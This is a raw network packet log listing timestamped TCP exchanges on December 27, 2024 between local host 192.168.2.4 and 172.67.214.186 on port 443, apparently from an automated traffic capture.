                                                                                                                                      Dec 27, 2024 10:21:54.819912910 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.825330973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.825346947 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.825417042 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.825432062 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.825474977 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.831335068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.831350088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.831423998 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.831438065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.834589958 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.836590052 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.836606026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.836684942 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.836699009 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.838747025 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.998307943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.998327017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.998512030 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:54.998529911 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:54.998588085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.003479004 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.003496885 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.003581047 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.003597975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.006269932 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.009438992 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.009468079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.009514093 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.009529114 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.009573936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.009573936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.015420914 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.015435934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.015508890 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.015538931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.018197060 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.020694017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.020709038 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.020778894 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.020793915 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.022257090 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.025295973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.025369883 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.025376081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.025402069 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.025425911 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.031306982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.031326056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.031368971 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.031394958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.031436920 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.036592960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.036606073 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.036657095 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.036674976 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.089493990 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.198589087 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.198611021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.198884010 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.198900938 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.198956966 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.204065084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.204081059 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.204129934 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.204145908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.204173088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.204195976 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.209712982 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.209731102 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.209785938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.209800959 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.210408926 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.217612028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.217628956 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.217694998 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.217724085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.218224049 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.221746922 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.221762896 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.221829891 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.221851110 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.222382069 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.227226019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.227241039 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.227298021 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.227307081 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.228108883 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.233237028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.233253002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.233308077 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.233319998 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.234025955 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.239062071 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.239075899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.239140034 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.239150047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.239936113 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.399468899 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.399488926 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.399784088 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.399854898 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.402168036 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.405468941 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.405483961 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.405570030 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.405586958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.406261921 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.411371946 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.411387920 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.411475897 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.411494017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.413398027 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.417332888 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.417349100 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.417459965 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.417476892 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.417714119 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.422600031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.422614098 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.422686100 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.422713041 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.423149109 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.428198099 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.428212881 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.428296089 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.428312063 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.429215908 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.434216022 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.434232950 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.434309959 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.434339046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.435107946 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.440084934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.440103054 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.440973997 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.440994978 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.441065073 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.601006031 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.601027012 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.601226091 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.601243973 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.601310968 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.607022047 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.607038021 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.607116938 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.607131958 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.607933044 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.612818003 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.612832069 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.612907887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.612920046 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.613734007 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.618855953 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.618870974 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.618952990 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.618967056 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.619756937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.624119997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.624135017 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.624209881 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.624222994 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.625093937 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.629690886 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.629704952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.629780054 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.629793882 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.630645037 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.631386042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.631444931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.637290001 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.637304068 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.637371063 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.637386084 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.643331051 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.643353939 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.643399954 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.643430948 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.643456936 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.683238029 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.804210901 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.804229975 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.804461002 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.804483891 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.805572033 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.810105085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.810120106 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.810194969 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.810210943 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.811058044 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.816128016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.816143036 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.816215992 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.816246033 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.817073107 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.821448088 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.821465015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.821542978 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.821558952 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.822407007 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.827761889 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.827776909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.827861071 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.827877045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.828142881 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.833061934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.833077908 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.833153963 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.833168030 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.833216906 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.838886023 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.838901997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.838979959 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.838994980 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.839042902 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.844914913 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.844929934 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.845031977 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:55.845046997 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:55.845098972 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.005640984 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.005659103 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.005785942 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.005836010 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.005891085 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.011831045 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.011847019 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.011919022 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.011934042 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.011985064 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.017616987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.017632008 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.017702103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.017715931 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.017761946 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.022890091 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.022906065 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.022988081 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.023001909 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.023052931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.029145002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.029160023 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.029238939 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.029253960 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.029304028 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.034421921 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.034435987 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.034521103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.034537077 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.034586906 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.040433884 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.040448904 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.040528059 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.040555954 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.040601015 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.046358109 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.046372890 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.046458006 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.046473026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.046525002 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.207192898 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.207211018 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.207346916 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.207376957 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.207432985 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.213190079 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.213206053 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.213293076 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.213308096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.213363886 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.219105005 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.219120026 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.219193935 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.219208002 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.219259024 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.224328995 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.224344015 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.224409103 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.224440098 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.224488974 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.230314016 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.230333090 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.230393887 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.230408907 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.230474949 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.235912085 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.235927105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.235996008 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.236011028 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.236057043 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.241978884 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.241995096 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.242058039 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.242072105 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.242130995 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.247832060 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.247847080 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.247915983 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.247930050 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.247980118 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.408612013 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.408628941 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.408726931 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.408765078 CET44349745172.67.214.186192.168.2.4
                                                                                                                                      Dec 27, 2024 10:21:56.408821106 CET49745443192.168.2.4172.67.214.186
                                                                                                                                      Dec 27, 2024 10:21:56.414560080 CET44349745172.67.214.186192.168.2.4
